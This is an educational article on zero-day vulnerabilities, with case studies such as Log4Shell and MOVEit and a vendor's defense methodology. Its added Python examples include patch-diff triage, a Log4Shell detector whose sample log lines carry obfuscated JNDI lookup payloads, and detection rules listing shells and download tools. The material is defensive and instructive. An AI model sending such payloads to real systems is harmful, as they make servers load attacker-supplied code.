# Zero-Day Vulnerabilities
A zero-day vulnerability is a software flaw that is unknown to the vendor and has no available patch at the time it is discovered or exploited. The term "zero-day" refers to the number of days the vendor has had to produce a fix: zero. The vendor learns about the vulnerability either through its own research, through responsible disclosure from a security researcher, or by discovering that it is already being exploited in the wild (a zero-day exploit).
Zero-days represent the most challenging class of vulnerability because the standard defensive playbook (identify the vulnerability, apply the patch, verify the fix) does not apply. There is no patch. The vulnerability scanner may not detect it. The signature-based detection may not recognize the exploit. The organization is exposed to a threat that its standard controls were not designed to address.
The distinction between a zero-day vulnerability and a zero-day exploit is important. A zero-day vulnerability exists in the software but may not be actively exploited. A zero-day exploit is a working attack that uses the vulnerability to compromise systems. Not every zero-day vulnerability has a corresponding zero-day exploit (some are discovered and patched before exploitation). Every zero-day exploit has a corresponding zero-day vulnerability. The risk is highest when the exploit exists and is actively used in the wild.
Google's Threat Analysis Group (TAG) and Mandiant tracked 97 zero-day vulnerabilities exploited in the wild in 2023, an increase from 62 in 2022. The trend is upward: more zero-days are being discovered and exploited each year, driven by increasing attacker investment in vulnerability research (both state-sponsored and commercial spyware vendors) and expanding attack surface (more software, more complexity, more internet-facing services).
Discovery. The vulnerability is found by a security researcher, a threat actor, or the vendor's own security team. The discoverer's decision at this point determines the vulnerability's trajectory:
Responsible disclosure (today more often called coordinated vulnerability disclosure): the researcher reports the vulnerability to the vendor privately, giving the vendor time to develop and release a patch before the vulnerability is publicly disclosed. CERT/CC, vendor bug bounty programs, and direct vendor contact are common disclosure channels. The best-known deadline is 90 days from the report to public release (Google Project Zero's policy); it is a widely followed norm rather than a formal industry standard.
Exploitation: the threat actor discovers the vulnerability and develops an exploit without informing the vendor. The vulnerability is exploited against targets while the vendor remains unaware. This is the zero-day exploit scenario: the vendor has zero days of awareness.
Commercial sale: the discoverer sells the vulnerability or exploit to a government agency, a commercial spyware vendor (NSO Group, Intellexa, Candiru), or an exploit broker (Zerodium, Crowdfense). The buyer uses the exploit for intelligence collection, law enforcement, or offensive operations. Commercial exploit markets create financial incentives for discovering and withholding zero-days rather than reporting them.
Exploitation window. The period between the first exploitation and the vendor's patch release. During this window, every organization running the vulnerable software is exposed. The exploitation window for zero-days exploited in the wild varies from days to months: some zero-days are discovered through their exploitation and patched within days (the vendor rushes an emergency patch). Others are exploited for months before detection (the attacker uses the exploit sparingly to avoid triggering the investigation that would lead to discovery).
Patch release. The vendor develops and releases a patch. The zero-day becomes a known vulnerability with an available fix. The exploitation window closes for organizations that apply the patch. The exploitation window remains open for organizations that do not (and many do not: patch deployment timelines of 30 to 90 days mean the vulnerability may be exploitable for months after the patch is available).
Post-patch exploitation. After the patch is released, the vulnerability details are public (or derivable through patch diffing: comparing the patched code to the unpatched code to identify the fix and reverse-engineer the vulnerability). Attackers who did not have the zero-day exploit before the patch can now develop one. Post-patch exploitation is common: many organizations do not patch promptly, and the public disclosure of the vulnerability provides a roadmap for every attacker who was not already exploiting it.
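A worked illustration of the patch-diffing step described above. This is an added example, not code from the original article: the two C snippets are a constructed, hypothetical record parser (the pre-patch version copies a length-prefixed name without checking it; the post-patch version adds a bounds check), and the Python script is the kind of triage an analyst runs first, diffing the two versions and pulling out inserted lines that look like new validation together with the operation they now guard. The `CHECK_HINT` regex is a heuristic and is labelled as such in the code.

```python
import difflib
import re

# Constructed pre- and post-patch versions of a hypothetical C parser.
# They are illustrative only, not code from any real product.
OLD_SRC = r"""int parse_record(struct rec *r, const uint8_t *buf, size_t buflen)
{
    uint8_t len = buf[0];
    memcpy(r->name, buf + 1, len);
    r->name[len] = '\0';
    return 0;
}
"""

NEW_SRC = r"""int parse_record(struct rec *r, const uint8_t *buf, size_t buflen)
{
    uint8_t len = buf[0];
    if (len >= sizeof(r->name) || (size_t)len + 1 > buflen)
        return -EINVAL;
    memcpy(r->name, buf + 1, len);
    r->name[len] = '\0';
    return 0;
}
"""

# Heuristic (assumption, not a rule): added lines that compare against a
# size, length or NULL, or that return an error early, are usually the
# newly introduced validation that the fix consists of.
CHECK_HINT = re.compile(r"\bif\b.*(sizeof|len|size|NULL|<|>)|\breturn\s+-")


def unified_patch(old: str, new: str) -> str:
    """Textual diff: the same view a patch-diffing analyst starts from."""
    return "".join(difflib.unified_diff(
        old.splitlines(keepends=True), new.splitlines(keepends=True),
        fromfile="pre-patch", tofile="post-patch"))


def locate_fix(old: str, new: str) -> list[dict]:
    """Return each inserted block that looks like a check, paired with the
    first unchanged line after it, i.e. the operation the check now guards.
    That guarded line is where the reverse engineer looks for the bug."""
    old_lines, new_lines = old.splitlines(), new.splitlines()
    matcher = difflib.SequenceMatcher(None, old_lines, new_lines)
    findings = []
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag != "insert":
            continue
        added = [line.strip() for line in new_lines[j1:j2]]
        if not any(CHECK_HINT.search(line) for line in added):
            continue
        guarded = old_lines[i1].strip() if i1 < len(old_lines) else None
        findings.append({"check": added, "guards": guarded})
    return findings


if __name__ == "__main__":
    print(unified_patch(OLD_SRC, NEW_SRC))
    for finding in locate_fix(OLD_SRC, NEW_SRC):
        print("added check:", finding["check"])
        print("guards     :", finding["guards"])
```

On the constructed input the script pairs the new `if (len >= sizeof(r->name) ...)` check with the `memcpy(r->name, buf + 1, len);` it guards, which is exactly the unchecked copy an attacker would target in the unpatched build. Real binaries require a decompiler and a binary diff rather than `difflib`, but the reasoning is the same: the added check points at the sink.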
Nation-state actors. The primary consumers of zero-day exploits. State-sponsored cyber operations (Chinese MSS, Russian GRU/SVR, North Korean Lazarus Group, Iranian APT groups) use zero-days for espionage, pre-positioning, and destructive operations. The Stuxnet operation (U.S./Israel, targeting Iran's nuclear program) used four zero-day exploits simultaneously. China's Volt Typhoon has exploited zero-days in edge network devices for critical infrastructure pre-positioning.
Commercial spyware vendors. Companies like NSO Group (Pegasus spyware), Intellexa (Predator spyware), and others develop and sell zero-day exploit chains to government customers for surveillance. Pegasus has exploited zero-click zero-days in iOS (requiring no user interaction: a specially crafted iMessage triggers the exploit and compromises the device without the user clicking anything). The commercial spyware industry is a significant zero-day consumer that drives exploit development investment.
Ransomware operators. Increasingly using zero-days for initial access. The Cl0p ransomware group exploited zero-days in MOVEit Transfer (CVE-2023-34362), GoAnywhere MFT (CVE-2023-0669), and Accellion FTA (CVE-2021-27101) for mass exploitation campaigns. Cl0p's model: discover or purchase a zero-day in a widely deployed file transfer application, exploit it at scale before the vendor can patch, exfiltrate data from thousands of victims, and extort payment.
Security researchers. Ethical researchers who discover zero-days and report them through responsible disclosure. Bug bounty programs (HackerOne, Bugcrowd, vendor-specific programs) provide financial incentives for responsible disclosure: Apple pays up to $2 million for the most critical zero-day reports. Google pays up to $250,000. The bug bounty market competes with the exploit broker market for researcher attention.
Log4Shell (CVE-2021-44228, December 2021). A critical remote code execution vulnerability in Apache Log4j, a ubiquitous Java logging library. Log4Shell was trivially exploitable: any attacker-controlled string that reached a Log4j log call (a User-Agent header, a username field) could carry a `${jndi:...}` lookup that made the application contact an attacker-controlled server and load code from it. It affected hundreds of thousands of applications. Exploitation began within hours of public disclosure and continued for months as organizations struggled to identify and patch every instance of Log4j in their environments, including copies embedded inside third-party software.
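The "specially crafted string" deserves a concrete look, because it is also why naive signature matching failed during the Log4Shell response. The block below is an added example, not part of the original article: it models the small subset of Log4j 2 lookup evaluation that obfuscated payloads relied on (`${lower:x}`, `${upper:x}`, and the `${key:-default}` fallback for lookups such as `env:` or an empty key that cannot resolve), resolves lookups inside-out, and only then checks for `${jndi:`. The access-log lines are constructed, the IP addresses are documentation ranges, and the modelled subset of lookup syntax is an assumption about which tricks matter, not a full reimplementation of Log4j.

```python
import re

# One innermost ${...} lookup: no nested "${" inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What the attacker ultimately needs Log4j to see. Log4j lower-cases the
# lookup prefix, so match case-insensitively.
JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(m: re.Match) -> str:
    """Emulate the subset of Log4j 2 lookup evaluation that obfuscated
    payloads rely on (assumption: this subset covers the common tricks):
    ${lower:x}, ${upper:x}, and the ${key:-default} fallback used when a
    lookup such as env:, sys: or an empty key cannot resolve."""
    body = m.group(1)
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() in ("lower", "upper") and ":-" not in rest:
        return rest.lower() if prefix.lower() == "lower" else rest.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return m.group(0)          # unknown lookup without a default: leave as is


def normalize(text: str, max_rounds: int = 16) -> str:
    """Resolve lookups inside-out until nothing changes (bounded, so a
    pathological input cannot spin the scanner)."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def naive_match(line: str) -> bool:
    """The literal signature many first-day detections used."""
    return "${jndi:" in line


def is_jndi_probe(line: str) -> bool:
    """Signature applied after normalization."""
    return JNDI.search(normalize(line)) is not None


# Constructed access-log lines (not captured traffic). Lines 2 to 4 are the
# same lookup as line 1 with the obfuscation seen during the incident.
SAMPLE_LINES = [
    'GET / HTTP/1.1 ua="${jndi:ldap://198.51.100.7:1389/a}"',
    'GET / HTTP/1.1 ua="${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    'GET / HTTP/1.1 ua="${${env:NOTEXIST:-j}${::-n}di:ldap://198.51.100.7:1389/a}"',
    'GET / HTTP/1.1 ua="${${upper:j}ndi:rmi://198.51.100.7:1099/a}"',
    'GET / HTTP/1.1 ua="Mozilla/5.0 (X11; Linux x86_64)"',
    'GET /cart HTTP/1.1 ua="${:-benign}"',
]


def scan(lines) -> list[int]:
    """Indices of lines that resolve to a JNDI lookup."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]


if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LINES):
        print(i, naive_match(line), is_jndi_probe(line), normalize(line))
```

The literal signature catches only the first line; the normalized check catches the first four and leaves the benign lookup alone. The lesson generalizes beyond Log4j: a signature written against the raw bytes of the first public proof of concept is brittle, and an exploit whose input is interpreted by the target needs the detection to interpret it the same way.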
MOVEit Transfer (CVE-2023-34362, May 2023). A SQL injection vulnerability in Progress Software's MOVEit Transfer managed file transfer application. Cl0p exploited the vulnerability as a zero-day in a mass campaign launched over the Memorial Day weekend, before Progress shipped a patch; the campaign ultimately affected more than 2,500 organizations and roughly 90 million individuals.
Citrix Bleed (CVE-2023-4966, October 2023). An information disclosure vulnerability in Citrix NetScaler ADC and Gateway that allowed attackers to steal session tokens and bypass authentication. LockBit ransomware operators exploited Citrix Bleed extensively against healthcare, government, and critical infrastructure targets.
Ivanti Connect Secure (CVE-2023-46805 and CVE-2024-21887, January 2024). An authentication bypass (CVE-2023-46805) and a command injection (CVE-2024-21887) in Ivanti's VPN appliance, chained to obtain unauthenticated remote code execution. Chinese state-sponsored actors exploited the chain as a zero-day for espionage and pre-positioning. CISA issued Emergency Directive 24-01 and, in supplemental direction, required federal agencies to disconnect affected appliances.
Zero-days challenge the fundamental assumption of signature-based security: that threats can be identified by matching known patterns. When the vulnerability is unknown and the exploit is novel, there is no signature to match, no CVE to scan for, and no patch to deploy. Organizations that rely exclusively on signature-based detection and patch-based remediation have no defense against zero-day exploitation.
Defense against zero-days requires controls that operate independently of specific vulnerability knowledge:
Network segmentation limits the attacker's ability to move from the initially exploited system to other systems, regardless of which vulnerability was used for initial access.
Behavioral analytics detects anomalous behavior (a web server spawning a command shell, an application making unexpected outbound connections) regardless of the specific exploit that caused it.
Least privilege limits the damage the attacker can cause from the compromised system by restricting the system's access to only what it operationally requires.
Application control prevents the execution of unauthorized binaries even if a vulnerability is successfully exploited. It stops dropped tooling, not a payload that runs in memory inside the already-compromised process, so it complements behavioral detection rather than replacing it.
Immutable backups ensure recovery capability even if the exploit leads to ransomware deployment.
These controls do not prevent the zero-day exploitation. They limit its impact and increase the probability of detection. The goal is not to stop every zero-day (which is impossible) but to ensure that a zero-day exploitation does not lead to domain-wide compromise.
More software, more complexity, and more internet-facing services mean more zero-day vulnerabilities. Every application, every library, and every network device is a potential source of zero-days. The attack surface available for zero-day discovery grows with the total volume of deployed software. Reducing the attack surface (removing unnecessary software, minimizing internet-facing services, consolidating technology stacks) reduces the probability that the organization runs the specific component the next zero-day affects.
Patch management addresses known vulnerabilities. Zero-days are unknown vulnerabilities. An organization with a perfect patch management program (100% compliance, 48-hour SLA for critical patches) is still vulnerable to zero-days because no patch exists to deploy. Patch management is necessary but not sufficient. Defense-in-depth (layered controls that do not depend on knowing the specific vulnerability) is required.
Zero-day defense spans VSD (attack surface reduction) and TID (detection without signatures) in the Planetary Defense Model.
CDA's Continuous Surface Reduction (CSR) methodology reduces zero-day exposure through attack surface minimization. "Every surface you expose is a surface we eliminate." Every unnecessary internet-facing service is a potential zero-day target. Every unnecessary software component is a potential zero-day source. CSR eliminates what is not operationally necessary, reducing the probability that the organization runs the specific software that the next zero-day affects.
CDA's Predictive Defense Intelligence (PDI) methodology detects zero-day exploitation through behavioral detection rather than signature matching. "See the threat before it sees you." An exploited web server that spawns a command shell, downloads additional tools, and initiates outbound connections to an unknown external IP exhibits behavior that PDI detects regardless of which CVE was exploited. The behavior is the indicator. The specific vulnerability is forensic context discovered after containment.
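The behaviors named above (a web server spawning a shell, then pulling down tooling, then connecting to an unknown external address) can be expressed as lineage rules over endpoint telemetry, and the same rules serve the behavioral-analytics control listed with the vulnerability-independent controls earlier. The block below is an added example, not code from CDA or from the original article: it tracks which processes descend from a web server and alerts on shells, download tools, and unexpected egress in that lineage, without any reference to a CVE. The events, the process names, the internal network ranges, and the egress allowlist are constructed assumptions standing in for what an EDR or sysmon-style feed would supply.

```python
import ipaddress

# Process images that face the internet and should almost never launch a
# shell or a download tool. Assumed inventory for a Linux/Windows web tier.
WEB_SERVERS = {"nginx", "httpd", "apache2", "w3wp.exe", "php-fpm"}
SHELLS = {"sh", "bash", "dash", "cmd.exe", "powershell.exe", "pwsh"}
DOWNLOADERS = {"curl", "wget", "certutil.exe", "bitsadmin.exe"}

# Constructed network policy: these are "inside"; anything else is egress.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# The only external host the web tier is supposed to reach: a hypothetical
# package mirror in a documentation address range.
ALLOWED_EGRESS = {ipaddress.ip_address("198.51.100.10")}


def is_internal(addr: ipaddress.IPv4Address) -> bool:
    return any(addr in net for net in INTERNAL_NETS)


def detect(events):
    """Walk ordered process/network events and return (rule, pid) alerts.
    'tainted' holds pids that are a web server or descend from one; every
    rule keys off lineage plus behavior, never off which bug was used."""
    tainted = set()
    alerts = []
    for ev in events:
        if ev["type"] == "proc":
            pid, ppid, image = ev["pid"], ev["ppid"], ev["image"]
            inherited = ppid in tainted
            if image in WEB_SERVERS or inherited:
                tainted.add(pid)
            if inherited and image in SHELLS:
                alerts.append(("web_server_spawned_shell", pid))
            elif inherited and image in DOWNLOADERS:
                alerts.append(("download_tool_under_web_server", pid))
        elif ev["type"] == "net":
            dst = ipaddress.ip_address(ev["dst"])
            if (ev["pid"] in tainted and not is_internal(dst)
                    and dst not in ALLOWED_EGRESS):
                alerts.append(("unexpected_egress_from_web_tier", ev["pid"]))
    return alerts


# Constructed endpoint telemetry (not captured data): a web server is
# exploited through an unknown bug, spawns a shell, fetches a tool and
# calls out. An admin SSH session and a database query are benign noise.
SAMPLE_EVENTS = [
    {"type": "proc", "pid": 100, "ppid": 1,   "image": "nginx"},
    {"type": "net",  "pid": 100, "dst": "10.0.5.20", "dport": 5432},      # app database
    {"type": "proc", "pid": 300, "ppid": 1,   "image": "sshd"},
    {"type": "proc", "pid": 301, "ppid": 300, "image": "bash"},            # admin login
    {"type": "proc", "pid": 200, "ppid": 100, "image": "sh"},              # post-exploit
    {"type": "proc", "pid": 201, "ppid": 200, "image": "curl"},
    {"type": "net",  "pid": 201, "dst": "203.0.113.45", "dport": 443},    # unknown host
    {"type": "net",  "pid": 100, "dst": "198.51.100.10", "dport": 443},   # allowed mirror
]


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"ALERT {rule} pid={pid}")
```

The three alerts fire on pids 200 and 201 only; the admin's `bash` under `sshd` and the web server's own database connection are ignored because the rules are scoped to web-server lineage. In production the noisy part is the inventory: a PHP application that legitimately shells out, or an update job under the web user, has to be allowlisted by parent and command line rather than by disabling the rule.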
CDA approaches zero-day defense with one principle: assume you are running vulnerable software (because you are). The defensive architecture must function under the assumption that an attacker has exploited a vulnerability that no one has discovered yet. Segmentation, behavioral detection, least privilege, and immutable backups provide defense under this assumption. Signature-based detection and patching do not.
Written by Evan Morgan